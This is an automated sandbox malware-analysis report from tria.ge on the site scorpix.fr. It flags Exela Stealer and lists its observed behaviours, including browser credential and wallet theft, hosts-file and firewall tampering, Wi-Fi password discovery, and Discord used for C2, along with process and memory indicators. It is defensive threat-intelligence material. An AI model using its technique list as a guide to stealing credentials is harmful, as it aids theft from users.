Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
289s -
max time network
290s -
platform
windows10-2004_x64 -
resource
win10v2004-20240730-en -
resource tags
arch:x64arch:x86image:win10v2004-20240730-enlocale:en-usos:windows10-2004-x64system -
submitted
01/08/2024, 16:17
Static task
static1
URLScan task
urlscan1
Behavioral task
behavioral1
Sample
http://scorpix.fr
Resource
win10v2004-20240730-en
General
-
Target
http://scorpix.fr
Malware Config
Signatures
-
Exela Stealer
Exela Stealer is an open source stealer originally written in .NET and later transitioned to Python that was first observed in August 2023.
-
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
pid Process 2276 powershell.exe 3244 powershell.exe 5788 powershell.exe 5196 powershell.exe 6120 powershell.exe 2280 powershell.exe 3628 powershell.exe 5208 powershell.exe 5868 powershell.exe 1944 powershell.exe 620 powershell.exe 4808 powershell.exe -
Downloads MZ/PE file
-
Drops file in Drivers directory 6 IoCs
description ioc Process File opened for modification C:\Windows\System32\drivers\etc\hosts attrib.exe File opened for modification C:\Windows\System32\drivers\etc\hosts ScorpixV2.exe File opened for modification C:\Windows\System32\drivers\etc\hosts attrib.exe File opened for modification C:\Windows\System32\drivers\etc\hosts attrib.exe File opened for modification C:\Windows\System32\drivers\etc\hosts ScorpixV2.exe File opened for modification C:\Windows\System32\drivers\etc\hosts attrib.exe -
Modifies Windows Firewall 2 TTPs 4 IoCs
pid Process 4760 netsh.exe 5316 netsh.exe 4800 netsh.exe 3648 netsh.exe -
Clipboard Data 1 TTPs 8 IoCs
Adversaries may collect data stored in the clipboard from users copying information within or between applications.
pid Process 3348 cmd.exe 4668 powershell.exe 4076 cmd.exe 3156 powershell.exe 5792 cmd.exe 3936 powershell.exe 5856 cmd.exe 2656 powershell.exe -
Executes dropped EXE 22 IoCs
pid Process 3936 ScorpixV2.exe 3672 ScorpixV2.exe 1900 ScorpixV2.exe 4076 ScorpixV2.exe 5408 ScorpixV2.exe 5228 bound.exe 5740 bound.exe 5808 ScorpixV2.exe 5952 ScorpixV2.exe 6080 ScorpixV2.exe 6080 rar.exe 6024 ScorpixV2.exe 4960 ScorpixV2.exe 4924 bound.exe 5724 bound.exe 4360 ScorpixV2.exe 2696 ScorpixV2.exe 2032 ScorpixV2.exe 1948 ScorpixV2.exe 1976 rar.exe 5488 ScorpixV2.exe 5520 ScorpixV2.exe -
Loads dropped DLL 64 IoCs
pid Process 3672 ScorpixV2.exe 3672 ScorpixV2.exe 3672 ScorpixV2.exe 3672 ScorpixV2.exe 4076 ScorpixV2.exe 4076 ScorpixV2.exe 4076 ScorpixV2.exe 4076 ScorpixV2.exe 4076 ScorpixV2.exe 4076 ScorpixV2.exe 4076 ScorpixV2.exe 4076 ScorpixV2.exe 4076 ScorpixV2.exe 4076 ScorpixV2.exe 4076 ScorpixV2.exe 4076 ScorpixV2.exe 4076 ScorpixV2.exe 4076 ScorpixV2.exe 4076 ScorpixV2.exe 4076 ScorpixV2.exe 4076 ScorpixV2.exe 3672 ScorpixV2.exe 3672 ScorpixV2.exe 3672 ScorpixV2.exe 3672 ScorpixV2.exe 3672 ScorpixV2.exe 3672 ScorpixV2.exe 3672 ScorpixV2.exe 3672 ScorpixV2.exe 5740 bound.exe 5740 bound.exe 3672 ScorpixV2.exe 5808 ScorpixV2.exe 3672 ScorpixV2.exe 5808 ScorpixV2.exe 5740 bound.exe 5740 bound.exe 5740 bound.exe 5808 ScorpixV2.exe 5808 ScorpixV2.exe 5740 bound.exe 5740 bound.exe 5740 bound.exe 5740 bound.exe 5740 bound.exe 5740 bound.exe 5740 bound.exe 3672 ScorpixV2.exe 3672 ScorpixV2.exe 5740 bound.exe 5740 bound.exe 5740 bound.exe 6080 ScorpixV2.exe 6080 ScorpixV2.exe 5740 bound.exe 5740 bound.exe 5740 bound.exe 5740 bound.exe 5740 bound.exe 5740 bound.exe 5808 ScorpixV2.exe 5808 ScorpixV2.exe 5808 ScorpixV2.exe 5808 ScorpixV2.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
resource yara_rule behavioral1/files/0x0007000000023511-145.dat upx behavioral1/memory/3672-149-0x00007FFB71BD0000-0x00007FFB7203E000-memory.dmp upx behavioral1/files/0x0007000000023503-160.dat upx behavioral1/memory/3672-185-0x00007FFB726E0000-0x00007FFB72704000-memory.dmp upx behavioral1/memory/3672-186-0x00007FFB7B3A0000-0x00007FFB7B3AF000-memory.dmp upx behavioral1/files/0x0007000000023526-206.dat upx behavioral1/memory/4076-217-0x00007FFB76230000-0x00007FFB7623F000-memory.dmp upx behavioral1/files/0x000700000002352d-216.dat upx behavioral1/files/0x000700000002352c-215.dat upx behavioral1/files/0x000700000002352b-214.dat upx behavioral1/files/0x0007000000023527-211.dat upx behavioral1/memory/4076-237-0x00007FFB5EF30000-0x00007FFB5F2A7000-memory.dmp upx behavioral1/memory/4076-241-0x00007FFB5EE10000-0x00007FFB5EF28000-memory.dmp upx behavioral1/memory/4076-240-0x00007FFB72930000-0x00007FFB7293D000-memory.dmp upx behavioral1/memory/4076-239-0x00007FFB6EC80000-0x00007FFB6EC94000-memory.dmp upx behavioral1/memory/4076-236-0x00007FFB5F2B0000-0x00007FFB5F367000-memory.dmp upx behavioral1/memory/4076-235-0x00007FFB708B0000-0x00007FFB708DE000-memory.dmp upx behavioral1/memory/4076-234-0x00007FFB76150000-0x00007FFB7615D000-memory.dmp upx behavioral1/memory/4076-233-0x00007FFB70910000-0x00007FFB70929000-memory.dmp upx behavioral1/memory/4076-232-0x00007FFB5F370000-0x00007FFB5F4D9000-memory.dmp upx behavioral1/memory/4076-231-0x00007FFB71B50000-0x00007FFB71B6F000-memory.dmp upx behavioral1/memory/4076-230-0x00007FFB722D0000-0x00007FFB722E9000-memory.dmp upx behavioral1/memory/4076-229-0x00007FFB71B70000-0x00007FFB71B9D000-memory.dmp upx behavioral1/files/0x0007000000023525-210.dat upx behavioral1/memory/4076-218-0x00007FFB71BA0000-0x00007FFB71BC4000-memory.dmp upx behavioral1/memory/4076-202-0x00007FFB5F4E0000-0x00007FFB5F94E000-memory.dmp upx behavioral1/files/0x000700000002350a-184.dat upx behavioral1/files/0x0007000000023509-183.dat upx behavioral1/files/0x0007000000023508-182.dat upx behavioral1/files/0x0007000000023507-181.dat upx behavioral1/files/0x0007000000023506-180.dat upx behavioral1/files/0x0007000000023505-179.dat upx behavioral1/files/0x0007000000023504-178.dat upx behavioral1/files/0x0007000000023502-177.dat upx behavioral1/memory/3672-277-0x00007FFB5B3A0000-0x00007FFB5B3B9000-memory.dmp upx behavioral1/memory/3672-285-0x00007FFB5A890000-0x00007FFB5A9F9000-memory.dmp upx behavioral1/memory/3672-284-0x00007FFB5B2A0000-0x00007FFB5B2BF000-memory.dmp upx behavioral1/memory/3672-276-0x00007FFB62A80000-0x00007FFB62AAD000-memory.dmp upx behavioral1/memory/3672-351-0x00007FFB63010000-0x00007FFB6303E000-memory.dmp upx behavioral1/memory/3672-352-0x00007FFB726E0000-0x00007FFB72704000-memory.dmp upx behavioral1/memory/3672-350-0x00007FFB71BD0000-0x00007FFB7203E000-memory.dmp upx behavioral1/memory/3672-356-0x00007FFB56AA0000-0x00007FFB56E17000-memory.dmp upx behavioral1/memory/5740-360-0x00007FFB70900000-0x00007FFB7090F000-memory.dmp upx behavioral1/memory/5740-362-0x00007FFB5BD10000-0x00007FFB5BD34000-memory.dmp upx behavioral1/memory/3672-401-0x00007FFB5A890000-0x00007FFB5A9F9000-memory.dmp upx behavioral1/memory/3672-406-0x00007FFB56AA0000-0x00007FFB56E17000-memory.dmp upx behavioral1/memory/5740-422-0x00007FFB5B450000-0x00007FFB5B472000-memory.dmp upx behavioral1/memory/6080-430-0x00007FFB5B270000-0x00007FFB5B294000-memory.dmp upx behavioral1/memory/6080-429-0x00007FFB6B7B0000-0x00007FFB6B7BF000-memory.dmp upx behavioral1/memory/5808-443-0x00007FFB53C70000-0x00007FFB53FE7000-memory.dmp upx behavioral1/memory/5808-459-0x00007FFB56630000-0x00007FFB56A9E000-memory.dmp upx behavioral1/memory/5808-481-0x00007FFB53C70000-0x00007FFB53FE7000-memory.dmp upx behavioral1/memory/5740-493-0x00007FFB5BAE0000-0x00007FFB5BC49000-memory.dmp upx behavioral1/memory/6080-509-0x00007FFB71BD0000-0x00007FFB71BE9000-memory.dmp upx behavioral1/memory/6080-508-0x00007FFB63010000-0x00007FFB6303D000-memory.dmp upx behavioral1/memory/6080-507-0x00007FFB71C40000-0x00007FFB71C4D000-memory.dmp upx behavioral1/memory/6080-506-0x00007FFB728C0000-0x00007FFB728D4000-memory.dmp upx behavioral1/memory/6080-505-0x00007FFB5A900000-0x00007FFB5A9B7000-memory.dmp upx behavioral1/memory/6080-504-0x00007FFB538F0000-0x00007FFB53C67000-memory.dmp upx behavioral1/memory/5740-492-0x00007FFB5BC50000-0x00007FFB5BC6F000-memory.dmp upx behavioral1/memory/5740-491-0x00007FFB5BCC0000-0x00007FFB5BCD9000-memory.dmp upx behavioral1/memory/6080-490-0x00007FFB5A9C0000-0x00007FFB5AB29000-memory.dmp upx behavioral1/memory/6080-489-0x00007FFB68C00000-0x00007FFB68C1F000-memory.dmp upx behavioral1/memory/6080-488-0x00007FFB71BD0000-0x00007FFB71BE9000-memory.dmp upx -
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 14 IoCs
flow ioc 86 discord.com 89 discord.com 119 discord.com 121 discord.com 87 discord.com 90 discord.com 117 discord.com 79 discord.com 80 discord.com 108 discord.com 85 discord.com 107 discord.com 118 discord.com 120 discord.com -
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 56 ip-api.com 71 ip-api.com 104 ip-api.com -
pid Process 5364 cmd.exe 3456 ARP.EXE 5620 cmd.exe 5632 ARP.EXE -
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
Drops file in System32 directory 2 IoCs
description ioc Process File created C:\Windows\System32\DriverStore\FileRepository\display.inf_amd64_71aa85b0e2292a7a\display.PNF chrome.exe File created \??\c:\windows\system32\driverstore\filerepository\display.inf_amd64_71aa85b0e2292a7a\display.PNF chrome.exe -
Enumerates processes with tasklist 1 TTPs 20 IoCs
pid Process 6008 tasklist.exe 5220 tasklist.exe 4412 tasklist.exe 5428 tasklist.exe 3708 tasklist.exe 5824 tasklist.exe 5988 tasklist.exe 5084 tasklist.exe 3168 tasklist.exe 3920 tasklist.exe 2240 tasklist.exe 5248 tasklist.exe 6140 tasklist.exe 5300 tasklist.exe 3556 tasklist.exe 5604 tasklist.exe 5972 tasklist.exe 3280 tasklist.exe 5244 tasklist.exe 5460 tasklist.exe -
Drops file in Program Files directory 2 IoCs
description ioc Process File opened for modification C:\Program Files\Crashpad\metadata setup.exe File opened for modification C:\Program Files\Crashpad\settings.dat setup.exe -
Launches sc.exe 2 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 2264 sc.exe 5820 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 24 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe -
Permission Groups Discovery: Local Groups 1 TTPs
Attempt to find local system groups and permission settings.
-
System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 8 IoCs
Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.
pid Process 1912 cmd.exe 64 netsh.exe 3064 cmd.exe 5344 netsh.exe 3156 cmd.exe 2636 netsh.exe 4892 cmd.exe 5080 netsh.exe -
System Network Connections Discovery 1 TTPs 2 IoCs
Attempt to get a listing of network connections.
pid Process 4000 NETSTAT.EXE 5008 NETSTAT.EXE -
Collects information from the system 1 TTPs 2 IoCs
Uses WMIC.exe to find detailed system information.
pid Process 5268 WMIC.exe 5380 WMIC.exe -
Detects videocard installed 1 TTPs 8 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 5844 WMIC.exe 2872 WMIC.exe 5804 WMIC.exe 2876 WMIC.exe 2764 WMIC.exe 5652 WMIC.exe 2032 WMIC.exe 3600 WMIC.exe -
Enumerates system info in registry 2 TTPs 6 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe -
Gathers network information 2 TTPs 4 IoCs
Uses commandline utility to view network configuration.
pid Process 4000 NETSTAT.EXE 2860 ipconfig.exe 5008 NETSTAT.EXE 1752 ipconfig.exe -
Gathers system information 1 TTPs 4 IoCs
Runs systeminfo.exe.
pid Process 5140 systeminfo.exe 5440 systeminfo.exe 2784 systeminfo.exe 1296 systeminfo.exe -
Kills process with taskkill 30 IoCs
pid Process 5888 taskkill.exe 5512 taskkill.exe 5776 taskkill.exe 5476 taskkill.exe 5884 taskkill.exe 5568 taskkill.exe 5632 taskkill.exe 5336 taskkill.exe 4564 taskkill.exe 5612 taskkill.exe 5828 taskkill.exe 3688 taskkill.exe 5584 taskkill.exe 5748 taskkill.exe 5144 taskkill.exe 5224 taskkill.exe 3844 taskkill.exe 5424 taskkill.exe 5592 taskkill.exe 4392 taskkill.exe 5920 taskkill.exe 64 taskkill.exe 1176 taskkill.exe 4960 taskkill.exe 5848 taskkill.exe 5900 taskkill.exe 5836 taskkill.exe 5384 taskkill.exe 5420 taskkill.exe 5644 taskkill.exe -
Modifies data under HKEY_USERS 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry chrome.exe Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133670027798115629" chrome.exe -
NTFS ADS 1 IoCs
description ioc Process File opened for modification C:\Users\Admin\Downloads\Unconfirmed 200778.crdownload:SmartScreen msedge.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 800 msedge.exe 800 msedge.exe 3948 msedge.exe 3948 msedge.exe 4104 identity_helper.exe 4104 identity_helper.exe 4144 msedge.exe 4144 msedge.exe 3628 powershell.exe 3628 powershell.exe 3628 powershell.exe 5208 powershell.exe 5208 powershell.exe 5196 powershell.exe 5196 powershell.exe 5208 powershell.exe 5196 powershell.exe 5868 powershell.exe 5868 powershell.exe 5868 powershell.exe 3936 powershell.exe 3936 powershell.exe 3936 powershell.exe 6104 powershell.exe 6104 powershell.exe 6104 powershell.exe 2656 powershell.exe 2656 powershell.exe 2656 powershell.exe 6120 powershell.exe 6120 powershell.exe 6120 powershell.exe 5292 powershell.exe 5292 powershell.exe 5292 powershell.exe 2280 powershell.exe 2280 powershell.exe 2280 powershell.exe 3804 powershell.exe 3804 powershell.exe 3804 powershell.exe 620 powershell.exe 620 powershell.exe 2276 powershell.exe 2276 powershell.exe 1944 powershell.exe 1944 powershell.exe 2276 powershell.exe 620 powershell.exe 1944 powershell.exe 4808 powershell.exe 4808 powershell.exe 4668 powershell.exe 4668 powershell.exe 4208 powershell.exe 4208 powershell.exe 4668 powershell.exe 4208 powershell.exe 3244 powershell.exe 3244 powershell.exe 4860 powershell.exe 4860 powershell.exe 4860 powershell.exe 3156 powershell.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 28 IoCs
pid Process 3948 msedge.exe 3948 msedge.exe 3948 msedge.exe 3948 msedge.exe 3948 msedge.exe 3948 msedge.exe 3948 msedge.exe 3948 msedge.exe 3948 msedge.exe 2896 chrome.exe 2896 chrome.exe 2896 chrome.exe 2896 chrome.exe 2896 chrome.exe 2896 chrome.exe 2896 chrome.exe 2896 chrome.exe 2896 chrome.exe 2896 chrome.exe 2896 chrome.exe 2896 chrome.exe 2896 chrome.exe 2896 chrome.exe 2896 chrome.exe 2896 chrome.exe 2896 chrome.exe 2896 chrome.exe 2896 chrome.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 3628 powershell.exe Token: SeDebugPrivilege 5248 tasklist.exe Token: SeDebugPrivilege 5208 powershell.exe Token: SeDebugPrivilege 5196 powershell.exe Token: SeIncreaseQuotaPrivilege 5244 WMIC.exe Token: SeSecurityPrivilege 5244 WMIC.exe Token: SeTakeOwnershipPrivilege 5244 WMIC.exe Token: SeLoadDriverPrivilege 5244 WMIC.exe Token: SeSystemProfilePrivilege 5244 WMIC.exe Token: SeSystemtimePrivilege 5244 WMIC.exe Token: SeProfSingleProcessPrivilege 5244 WMIC.exe Token: SeIncBasePriorityPrivilege 5244 WMIC.exe Token: SeCreatePagefilePrivilege 5244 WMIC.exe Token: SeBackupPrivilege 5244 WMIC.exe Token: SeRestorePrivilege 5244 WMIC.exe Token: SeShutdownPrivilege 5244 WMIC.exe Token: SeDebugPrivilege 5244 WMIC.exe Token: SeSystemEnvironmentPrivilege 5244 WMIC.exe Token: SeRemoteShutdownPrivilege 5244 WMIC.exe Token: SeUndockPrivilege 5244 WMIC.exe Token: SeManageVolumePrivilege 5244 WMIC.exe Token: 33 5244 WMIC.exe Token: 34 5244 WMIC.exe Token: 35 5244 WMIC.exe Token: 36 5244 WMIC.exe Token: SeIncreaseQuotaPrivilege 5244 WMIC.exe Token: SeSecurityPrivilege 5244 WMIC.exe Token: SeTakeOwnershipPrivilege 5244 WMIC.exe Token: SeLoadDriverPrivilege 5244 WMIC.exe Token: SeSystemProfilePrivilege 5244 WMIC.exe Token: SeSystemtimePrivilege 5244 WMIC.exe Token: SeProfSingleProcessPrivilege 5244 WMIC.exe Token: SeIncBasePriorityPrivilege 5244 WMIC.exe Token: SeCreatePagefilePrivilege 5244 WMIC.exe Token: SeBackupPrivilege 5244 WMIC.exe Token: SeRestorePrivilege 5244 WMIC.exe Token: SeShutdownPrivilege 5244 WMIC.exe Token: SeDebugPrivilege 5244 WMIC.exe Token: SeSystemEnvironmentPrivilege 5244 WMIC.exe Token: SeRemoteShutdownPrivilege 5244 WMIC.exe Token: SeUndockPrivilege 5244 WMIC.exe Token: SeManageVolumePrivilege 5244 WMIC.exe Token: 33 5244 WMIC.exe Token: 34 5244 WMIC.exe Token: 35 5244 WMIC.exe Token: 36 5244 WMIC.exe Token: SeIncreaseQuotaPrivilege 2764 WMIC.exe Token: SeSecurityPrivilege 2764 WMIC.exe Token: SeTakeOwnershipPrivilege 2764 WMIC.exe Token: SeLoadDriverPrivilege 2764 WMIC.exe Token: SeSystemProfilePrivilege 2764 WMIC.exe Token: SeSystemtimePrivilege 2764 WMIC.exe Token: SeProfSingleProcessPrivilege 2764 WMIC.exe Token: SeIncBasePriorityPrivilege 2764 WMIC.exe Token: SeCreatePagefilePrivilege 2764 WMIC.exe Token: SeBackupPrivilege 2764 WMIC.exe Token: SeRestorePrivilege 2764 WMIC.exe Token: SeShutdownPrivilege 2764 WMIC.exe Token: SeDebugPrivilege 2764 WMIC.exe Token: SeSystemEnvironmentPrivilege 2764 WMIC.exe Token: SeRemoteShutdownPrivilege 2764 WMIC.exe Token: SeUndockPrivilege 2764 WMIC.exe Token: SeManageVolumePrivilege 2764 WMIC.exe Token: 33 2764 WMIC.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 3948 msedge.exe 3948 msedge.exe 3948 msedge.exe 3948 msedge.exe 3948 msedge.exe 3948 msedge.exe 3948 msedge.exe 3948 msedge.exe 3948 msedge.exe 3948 msedge.exe 3948 msedge.exe 3948 msedge.exe 3948 msedge.exe 3948 msedge.exe 3948 msedge.exe 3948 msedge.exe 3948 msedge.exe 3948 msedge.exe 3948 msedge.exe 3948 msedge.exe 3948 msedge.exe 3948 msedge.exe 3948 msedge.exe 3948 msedge.exe 3948 msedge.exe 3948 msedge.exe 3948 msedge.exe 3948 msedge.exe 3948 msedge.exe 3948 msedge.exe 3948 msedge.exe 3948 msedge.exe 3948 msedge.exe 3948 msedge.exe 3948 msedge.exe 3948 msedge.exe 3948 msedge.exe 3948 msedge.exe 3948 msedge.exe 2896 chrome.exe 2896 chrome.exe 2896 chrome.exe 2896 chrome.exe 2896 chrome.exe 2896 chrome.exe 2896 chrome.exe 2896 chrome.exe 2896 chrome.exe 2896 chrome.exe 2896 chrome.exe 2896 chrome.exe 2896 chrome.exe 2896 chrome.exe 2896 chrome.exe 2896 chrome.exe 2896 chrome.exe 2896 chrome.exe 2896 chrome.exe 2896 chrome.exe 2896 chrome.exe 2896 chrome.exe 2896 chrome.exe 2896 chrome.exe 2896 chrome.exe -
Suspicious use of SendNotifyMessage 48 IoCs
pid Process 3948 msedge.exe 3948 msedge.exe 3948 msedge.exe 3948 msedge.exe 3948 msedge.exe 3948 msedge.exe 3948 msedge.exe 3948 msedge.exe 3948 msedge.exe 3948 msedge.exe 3948 msedge.exe 3948 msedge.exe 3948 msedge.exe 3948 msedge.exe 3948 msedge.exe 3948 msedge.exe 3948 msedge.exe 3948 msedge.exe 3948 msedge.exe 3948 msedge.exe 3948 msedge.exe 3948 msedge.exe 3948 msedge.exe 3948 msedge.exe 2896 chrome.exe 2896 chrome.exe 2896 chrome.exe 2896 chrome.exe 2896 chrome.exe 2896 chrome.exe 2896 chrome.exe 2896 chrome.exe 2896 chrome.exe 2896 chrome.exe 2896 chrome.exe 2896 chrome.exe 2896 chrome.exe 2896 chrome.exe 2896 chrome.exe 2896 chrome.exe 2896 chrome.exe 2896 chrome.exe 2896 chrome.exe 2896 chrome.exe 2896 chrome.exe 2896 chrome.exe 2896 chrome.exe 2896 chrome.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3948 wrote to memory of 3028 3948 msedge.exe 83 PID 3948 wrote to memory of 3028 3948 msedge.exe 83 PID 3948 wrote to memory of 3468 3948 msedge.exe 86 PID 3948 wrote to memory of 3468 3948 msedge.exe 86 PID 3948 wrote to memory of 3468 3948 msedge.exe 86 PID 3948 wrote to memory of 3468 3948 msedge.exe 86 PID 3948 wrote to memory of 3468 3948 msedge.exe 86 PID 3948 wrote to memory of 3468 3948 msedge.exe 86 PID 3948 wrote to memory of 3468 3948 msedge.exe 86 PID 3948 wrote to memory of 3468 3948 msedge.exe 86 PID 3948 wrote to memory of 3468 3948 msedge.exe 86 PID 3948 wrote to memory of 3468 3948 msedge.exe 86 PID 3948 wrote to memory of 3468 3948 msedge.exe 86 PID 3948 wrote to memory of 3468 3948 msedge.exe 86 PID 3948 wrote to memory of 3468 3948 msedge.exe 86 PID 3948 wrote to memory of 3468 3948 msedge.exe 86 PID 3948 wrote to memory of 3468 3948 msedge.exe 86 PID 3948 wrote to memory of 3468 3948 msedge.exe 86 PID 3948 wrote to memory of 3468 3948 msedge.exe 86 PID 3948 wrote to memory of 3468 3948 msedge.exe 86 PID 3948 wrote to memory of 3468 3948 msedge.exe 86 PID 3948 wrote to memory of 3468 3948 msedge.exe 86 PID 3948 wrote to memory of 3468 3948 msedge.exe 86 PID 3948 wrote to memory of 3468 3948 msedge.exe 86 PID 3948 wrote to memory of 3468 3948 msedge.exe 86 PID 3948 wrote to memory of 3468 3948 msedge.exe 86 PID 3948 wrote to memory of 3468 3948 msedge.exe 86 PID 3948 wrote to memory of 3468 3948 msedge.exe 86 PID 3948 wrote to memory of 3468 3948 msedge.exe 86 PID 3948 wrote to memory of 3468 3948 msedge.exe 86 PID 3948 wrote to memory of 3468 3948 msedge.exe 86 PID 3948 wrote to memory of 3468 3948 msedge.exe 86 PID 3948 wrote to memory of 3468 3948 msedge.exe 86 PID 3948 wrote to memory of 3468 3948 msedge.exe 86 PID 3948 wrote to memory of 3468 3948 msedge.exe 86 PID 3948 wrote to memory of 3468 3948 msedge.exe 86 PID 3948 wrote to memory of 3468 3948 msedge.exe 86 PID 3948 wrote to memory of 3468 3948 msedge.exe 86 PID 3948 wrote to memory of 3468 3948 msedge.exe 86 PID 3948 wrote to memory of 3468 3948 msedge.exe 86 PID 3948 wrote to memory of 3468 3948 msedge.exe 86 PID 3948 wrote to memory of 3468 3948 msedge.exe 86 PID 3948 wrote to memory of 800 3948 msedge.exe 87 PID 3948 wrote to memory of 800 3948 msedge.exe 87 PID 3948 wrote to memory of 4020 3948 msedge.exe 88 PID 3948 wrote to memory of 4020 3948 msedge.exe 88 PID 3948 wrote to memory of 4020 3948 msedge.exe 88 PID 3948 wrote to memory of 4020 3948 msedge.exe 88 PID 3948 wrote to memory of 4020 3948 msedge.exe 88 PID 3948 wrote to memory of 4020 3948 msedge.exe 88 PID 3948 wrote to memory of 4020 3948 msedge.exe 88 PID 3948 wrote to memory of 4020 3948 msedge.exe 88 PID 3948 wrote to memory of 4020 3948 msedge.exe 88 PID 3948 wrote to memory of 4020 3948 msedge.exe 88 PID 3948 wrote to memory of 4020 3948 msedge.exe 88 PID 3948 wrote to memory of 4020 3948 msedge.exe 88 PID 3948 wrote to memory of 4020 3948 msedge.exe 88 PID 3948 wrote to memory of 4020 3948 msedge.exe 88 PID 3948 wrote to memory of 4020 3948 msedge.exe 88 PID 3948 wrote to memory of 4020 3948 msedge.exe 88 PID 3948 wrote to memory of 4020 3948 msedge.exe 88 PID 3948 wrote to memory of 4020 3948 msedge.exe 88 PID 3948 wrote to memory of 4020 3948 msedge.exe 88 PID 3948 wrote to memory of 4020 3948 msedge.exe 88 -
Views/modifies file attributes 1 TTPs 4 IoCs
pid Process 6092 attrib.exe 6076 attrib.exe 2032 attrib.exe 3648 attrib.exe
Processes
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://scorpix.fr1⤵
- Enumerates system info in registry
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3948 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffb62dd46f8,0x7ffb62dd4708,0x7ffb62dd47182⤵PID:3028
-
-
